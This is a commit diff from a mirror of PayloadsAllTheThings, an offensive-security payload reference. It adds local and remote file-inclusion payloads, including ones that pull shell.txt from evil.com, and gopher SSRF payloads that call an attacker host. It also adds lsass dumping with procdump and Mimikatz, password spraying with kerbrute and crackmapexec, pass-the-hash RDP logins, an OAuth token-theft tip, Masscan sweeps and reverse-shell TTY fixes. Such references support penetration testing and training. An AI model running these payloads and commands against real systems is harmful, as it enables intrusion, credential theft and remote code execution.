mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp
This commit is contained in:
parent
765c615efe
commit
bab04f8587
@ -7,6 +7,10 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Basic LFI](#basic-lfi)
|
* [Basic LFI](#basic-lfi)
|
||||||
|
* [Null byte](#null-byte)
|
||||||
|
* [Double encoding](#double-encoding)
|
||||||
|
* [Path truncation](#path-truncation)
|
||||||
|
* [Filter bypass tricks](#filter-bypass-tricks)
|
||||||
* [Basic RFI](#basic-rfi)
|
* [Basic RFI](#basic-rfi)
|
||||||
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||||
* [Wrapper php://filter](#wrapper-phpfilter)
|
* [Wrapper php://filter](#wrapper-phpfilter)
|
||||||
@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
|
|||||||
http://example.com/index.php?page=../../../etc/passwd
|
http://example.com/index.php?page=../../../etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
Null byte
|
### Null byte
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=../../../etc/passwd%00
|
http://example.com/index.php?page=../../../etc/passwd%00
|
||||||
```
|
```
|
||||||
|
|
||||||
Double encoding
|
### Double encoding
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
|
||||||
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
|
||||||
```
|
```
|
||||||
|
|
||||||
Path truncation
|
### Path truncation
|
||||||
|
|
||||||
|
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
|
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
|
||||||
|
http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE]
|
||||||
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
|
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
|
||||||
```
|
```
|
||||||
|
|
||||||
Filter bypass tricks
|
### Filter bypass tricks
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=....//....//etc/passwd
|
http://example.com/index.php?page=....//....//etc/passwd
|
||||||
@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
|
|||||||
http://example.com/index.php?page=http://evil.com/shell.txt
|
http://example.com/index.php?page=http://evil.com/shell.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Null byte
|
### Null byte
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
||||||
```
|
```
|
||||||
|
|
||||||
Double encoding
|
### Double encoding
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
||||||
@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
|
|||||||
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
|
||||||
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
|
||||||
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
|
||||||
|
* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
|
||||||
|
@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
|
|||||||
enum4linux | grep -i desc
|
enum4linux | grep -i desc
|
||||||
There are 3-4 fields that seem to be common in most AD schemas:
|
There are 3-4 fields that seem to be common in most AD schemas:
|
||||||
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
||||||
|
|
||||||
|
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
|
||||||
```
|
```
|
||||||
|
|
||||||
### PassTheTicket Golden Tickets
|
### PassTheTicket Golden Tickets
|
||||||
@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module
|
|||||||
|
|
||||||
### Password spraying
|
### Password spraying
|
||||||
|
|
||||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
||||||
|
|
||||||
|
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
|
||||||
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
|
||||||
|
```
|
||||||
|
|
||||||
Most of the time the best passwords to spray are :
|
Most of the time the best passwords to spray are :
|
||||||
|
|
||||||
- Password1
|
- Password1
|
||||||
|
@ -8,6 +8,7 @@
|
|||||||
* The Harvester
|
* The Harvester
|
||||||
|
|
||||||
* [Active Recon](#active-recon)
|
* [Active Recon](#active-recon)
|
||||||
|
* Masscan
|
||||||
* Nmap
|
* Nmap
|
||||||
* Nmap Script
|
* Nmap Script
|
||||||
* RPCClient
|
* RPCClient
|
||||||
@ -47,6 +48,13 @@
|
|||||||
|
|
||||||
## Active recon
|
## Active recon
|
||||||
|
|
||||||
|
* Masscan
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||||
|
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||||
|
```
|
||||||
|
|
||||||
* Basic NMAP
|
* Basic NMAP
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -1,38 +1,14 @@
|
|||||||
# Network Discovery
|
# Network Discovery
|
||||||
|
|
||||||
## Netdiscover
|
## Summary
|
||||||
|
|
||||||
```powershell
|
- [Nmap](#nmap)
|
||||||
netdiscover -i eth0 -r 192.168.1.0/24
|
- [Masscan](#masscan)
|
||||||
Currently scanning: Finished! | Screen View: Unique Hosts
|
- [Netdiscover](#netdiscover)
|
||||||
|
- [Responder](#responder)
|
||||||
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
|
- [Bettercap](#bettercap)
|
||||||
_____________________________________________________________________________
|
- [Reconnoitre](#reconnoitre)
|
||||||
IP At MAC Address Count Len MAC Vendor / Hostname
|
- [References](#references)
|
||||||
-----------------------------------------------------------------------------
|
|
||||||
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
|
|
||||||
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
|
|
||||||
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
|
|
||||||
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
|
|
||||||
```
|
|
||||||
|
|
||||||
## Responder
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
|
|
||||||
responder.py -I eth0 -wrf
|
|
||||||
```
|
|
||||||
|
|
||||||
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
|
||||||
|
|
||||||
## Bettercap
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
bettercap -X --proxy --proxy-https -T <target IP>
|
|
||||||
# better cap in spoofing, discovery, sniffer
|
|
||||||
# intercepting http and https requests,
|
|
||||||
# targetting specific IP only
|
|
||||||
```
|
|
||||||
|
|
||||||
## Nmap
|
## Nmap
|
||||||
|
|
||||||
@ -121,6 +97,13 @@ Host script results:
|
|||||||
List Nmap scripts : ls /usr/share/nmap/scripts/
|
List Nmap scripts : ls /usr/share/nmap/scripts/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Masscan
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
|
||||||
|
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
|
||||||
|
```
|
||||||
|
|
||||||
## Reconnoitre
|
## Reconnoitre
|
||||||
|
|
||||||
Dependencies:
|
Dependencies:
|
||||||
@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
|
|||||||
If you have a segfault with nbtscan, read the following quote.
|
If you have a segfault with nbtscan, read the following quote.
|
||||||
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
|
||||||
|
|
||||||
|
## Netdiscover
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
netdiscover -i eth0 -r 192.168.1.0/24
|
||||||
|
Currently scanning: Finished! | Screen View: Unique Hosts
|
||||||
|
|
||||||
|
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
|
||||||
|
_____________________________________________________________________________
|
||||||
|
IP At MAC Address Count Len MAC Vendor / Hostname
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
|
||||||
|
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
|
||||||
|
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
|
||||||
|
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
|
||||||
|
```
|
||||||
|
|
||||||
|
## Responder
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
|
||||||
|
responder.py -I eth0 -wrf
|
||||||
|
```
|
||||||
|
|
||||||
|
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
|
||||||
|
|
||||||
|
## Bettercap
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
bettercap -X --proxy --proxy-https -T <target IP>
|
||||||
|
# better cap in spoofing, discovery, sniffer
|
||||||
|
# intercepting http and https requests,
|
||||||
|
# targetting specific IP only
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [TODO](TODO)
|
* [TODO](TODO)
|
@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
|
|||||||
## Spawn TTY Shell
|
## Spawn TTY Shell
|
||||||
|
|
||||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||||
|
|
||||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
||||||
|
|
||||||
|
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
ctrl+z
|
ctrl+z
|
||||||
echo $TERM && tput lines && tput cols
|
echo $TERM && tput lines && tput cols
|
||||||
|
|
||||||
|
# for bash
|
||||||
stty raw -echo
|
stty raw -echo
|
||||||
fg
|
fg
|
||||||
|
|
||||||
|
# for zsh
|
||||||
|
stty raw -echo; fg
|
||||||
|
|
||||||
reset
|
reset
|
||||||
export SHELL=bash
|
export SHELL=bash
|
||||||
export TERM=xterm-256color
|
export TERM=xterm-256color
|
||||||
|
@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
|
|||||||
mimikatz_command -f sekurlsa::wdigest
|
mimikatz_command -f sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Mimikatz - Mini Dump
|
||||||
|
|
||||||
|
Dump the lsass process.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||||
|
|
||||||
|
net use Z: https://live.sysinternals.com
|
||||||
|
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
||||||
|
```
|
||||||
|
|
||||||
|
Then load it inside Mimikatz.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
mimikatz # sekurlsa::minidump lsass.dmp
|
||||||
|
Switch to minidump
|
||||||
|
mimikatz # sekurlsa::logonPasswords
|
||||||
|
```
|
||||||
|
|
||||||
## Mimikatz Golden ticket
|
## Mimikatz Golden ticket
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -119,18 +119,20 @@ or with crackmapexec
|
|||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||||
```
|
```
|
||||||
|
|
||||||
For Server 2012 R2, Win8.1+
|
or with Metasploit
|
||||||
|
|
||||||
```powershell
|
|
||||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
|
||||||
```
|
|
||||||
|
|
||||||
with Metasploit
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
run getgui -u admin -p 1234
|
run getgui -u admin -p 1234
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Then log in using xfreerdp
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
|
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Netuse (Windows)
|
## Netuse (Windows)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -1,4 +1,20 @@
|
|||||||
# OAuth 2 - Common vulnerabilities
|
# OAuth
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
|
||||||
|
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
|
||||||
|
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
|
||||||
|
- [OAuth private key disclosure](#oauth-private-key-disclosure)
|
||||||
|
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
|
||||||
|
- [Cross-Site Request Forgery](#cross-site-request-forgery)
|
||||||
|
- [References](#references)
|
||||||
|
|
||||||
|
## Stealing OAuth Token via referer
|
||||||
|
|
||||||
|
From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
|
||||||
|
|
||||||
|
> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer
|
||||||
|
|
||||||
## Grabbing OAuth Token via redirect_uri
|
## Grabbing OAuth Token via redirect_uri
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
|
|
||||||
A list of useful payloads and bypasses for Web Application Security.
|
A list of useful payloads and bypasses for Web Application Security.
|
||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
I <3 pull requests :)
|
I :heart: pull requests :)
|
||||||
|
|
||||||
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
||||||
|
|
||||||
|
@ -277,6 +277,13 @@ You didn't say the magic word !
|
|||||||
QUIT
|
QUIT
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Gopher HTTP
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
|
||||||
|
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
|
||||||
|
```
|
||||||
|
|
||||||
#### Gopher SMTP - Back connect to 1337
|
#### Gopher SMTP - Back connect to 1337
|
||||||
|
|
||||||
```php
|
```php
|
||||||
|
@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
|||||||
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
|
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
|
||||||
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
|
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
|
||||||
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
|
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
|
||||||
- he is able to make stored XSS from a irrelevant domain to main facebook domain
|
|
||||||
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
|
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
|
||||||
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
|
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
|
||||||
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
|
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
|
||||||
|
Loading…
Reference in New Issue
Block a user